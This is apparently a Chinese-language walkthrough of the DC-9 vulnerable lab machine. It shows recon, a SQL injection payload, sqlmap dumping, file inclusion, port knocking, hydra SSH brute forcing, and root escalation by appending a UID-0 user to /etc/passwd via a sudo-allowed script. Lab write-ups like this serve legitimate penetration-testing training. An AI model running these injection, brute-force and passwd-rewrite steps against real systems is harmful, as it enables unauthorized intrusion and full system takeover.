DC-9

DC系列是专门构建的易受攻击的实验室，旨在获得渗透测试领域的经验，目前总共有9个靶机
关注微信公众号：网络安全101，公众号内回复**DC**，即可获取DC系列靶机镜像！

导入DC9靶机，网络适配器选择NAT模式，确保和kali处于同一IP段！！！

## 信息收集

> 确定主机IP

```
netdiscover -i eth0 -r 192.168.84.0/24
```

![image-20221221165610497](https://oss.maolin101.com/20250107034612892.png-101.webp)

> 扫描端口

![image-20221221170313251](https://oss.maolin101.com/20250107034612893.png-101.webp)

![image-20221221174352328](https://oss.maolin101.com/20250107034612894.png-101.webp)

> nmap 漏洞扫描

![image-20221221170425338](https://oss.maolin101.com/20250107034612895.png-101.webp)

![image-20221221170642497](https://oss.maolin101.com/20250107034612896.png-101.webp)

## web测试

> 对检索出来的目录进行测试

搜索框

![image-20221221171140690](https://oss.maolin101.com/20250107034612897.png-101.webp)

您可以使用名字或姓氏进行搜索，可能会与数据库连接

当作搜索框输入1' or 1=1 -- qwe时，所有信息会被检索出来

![image-20221221171409105](https://oss.maolin101.com/20250107034612898.png-101.webp)

> 使用burp抓取请求数据，使用sqlmao跑包

![image-20221221171539057](https://oss.maolin101.com/20250107034612899.png-101.webp)

![image-20221221171902773](https://oss.maolin101.com/20250107034612900.png-101.webp)

![image-20221221171913427](https://oss.maolin101.com/20250107034612901.png-101.webp)

> 跑库-跑表-跑字段

![image-20221221172409794](https://oss.maolin101.com/20250107034612902.png-101.webp)

![image-20221221172629932](https://oss.maolin101.com/20250107034612903.png-101.webp)

![image-20221221173103239](https://oss.maolin101.com/20250107034612904.png-101.webp)

解密后的账户密码为：admin、transorbital1

> 登录

![image-20221221173204136](https://oss.maolin101.com/20250107034612905.png-101.webp)

页面多了一个添加记录功能

![image-20221221173312784](https://oss.maolin101.com/20250107034612906.png-101.webp)

在添加记录页面中，最下方有一个文件不存在

![image-20221221173418704](https://oss.maolin101.com/20250107034612907.png-101.webp)

是否是通过传参呢

> 验证

![image-20221221173505926](https://oss.maolin101.com/20250107034612908.png-101.webp)

添加多个跳转符，出现内容

![image-20221221173602122](https://oss.maolin101.com/20250107034612909.png-101.webp)

该处存在文件包含漏洞

> 读取apache 2.4的配置文件

nmap扫描到有22端口，但是流量都被过滤了，怀疑有knockd服务

```
knockd服务。
该服务通过动态的添加iptables规则来隐藏系统开启的服务，使用自定义的一系列序列号来“敲门”，使系统开启需要访问的服务端口，才能对外访问。
不使用时，再使用自定义的序列号来“关门”，将端口关闭，不对外监听。进一步提升了服务和系统的安全性
```

![image-20221221173826229](https://oss.maolin101.com/20250107034612910.png-101.webp)

> 因此使用masscan依次扫描该ip对应的三个端口

nmap 192.168.84.185 -p 7469

nmap 192.168.84.185 -p 8475

nmap 192.168.84.185 -p 9842

![image-20221221175016808](https://oss.maolin101.com/20250107034612911.png-101.webp)

> 将之前收集的用户详细信息用户爆破ssh端口

![image-20221221175443926](https://oss.maolin101.com/20250107034612912.png-101.webp)

分别存放于username.txt和pw.txt

> hydra进行爆破

![image-20221221180259535](https://oss.maolin101.com/20250107034612913.png-101.webp)

> 使用 janitor账户进行登录ssh

janitor、Ilovepeepee

![image-20221221180538459](https://oss.maolin101.com/20250107034612914.png-101.webp)

> 发现一个隐藏目录

![image-20221221180915691](https://oss.maolin101.com/20250107034612915.png-101.webp)

存放密码

![image-20221221181015922](https://oss.maolin101.com/20250107034612916.png-101.webp)

> 将密码再次进行爆破，得到新的内容

![image-20221221181226323](https://oss.maolin101.com/20250107034612917.png-101.webp)

fredf、B4-Tru3-001

> 直接su 切换

![image-20221221181321379](https://oss.maolin101.com/20250107034612918.png-101.webp)

## 提权

> sudo -l

![image-20221221181347354](https://oss.maolin101.com/20250107034612919.png-101.webp)

发现test文件不需要root的密码即可运行

> 查看test文件

打开test文件后，乱码，但可以根据部分单词判断该文件大概率为python文件

> 使用find命令 查找test.py文件

```
find / -name test.py 2>/dev/null

2>/dev/null 代表忽略掉错误提示信息。
```

![image-20221221181758253](https://oss.maolin101.com/20250107034612920.png-101.webp)

> 查看该文件

![image-20221221181836885](https://oss.maolin101.com/20250107034612921.png-101.webp)

py文件的含义为：`读取参数1的内容，然后将参数1的内容写入到参数2的内容中。`

> 提权思路

构造一个root权限用户，将该用户信息写入文件内，将改文件作为参数1，/etc/passwd作为参数2，这样就创建了一个root权限用户，就能实现提权了

> 构造payload

```
openssl passwd -1 -salt admin 123456

-1 的意思是使用md5加密算法
-salt 自动插入一个随机数作为文件内容加密
admin 123456 用户名和密码
```

![image-20221221182112312](https://oss.maolin101.com/20250107034612922.png-101.webp)

得到序列值为$1$admin$LClYcRe.ee8dQwgrFc5nz.

根据/etc/passwd的格式，修改一下，然后存入一个文件里，这个文件就是参数1

```
echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
    # 用户名:密码:uid:gid:家目录:登陆后使用的shell
    
sudo ./test /tmp/passwd /etc/passwd    
```

![image-20221221182428414](https://oss.maolin101.com/20250107034612923.png-101.webp)

![image-20221221182537173](https://oss.maolin101.com/20250107034612924.png-101.webp)

> flag

![image-20221221182605632](https://oss.maolin101.com/20250107034612925.png-101.webp)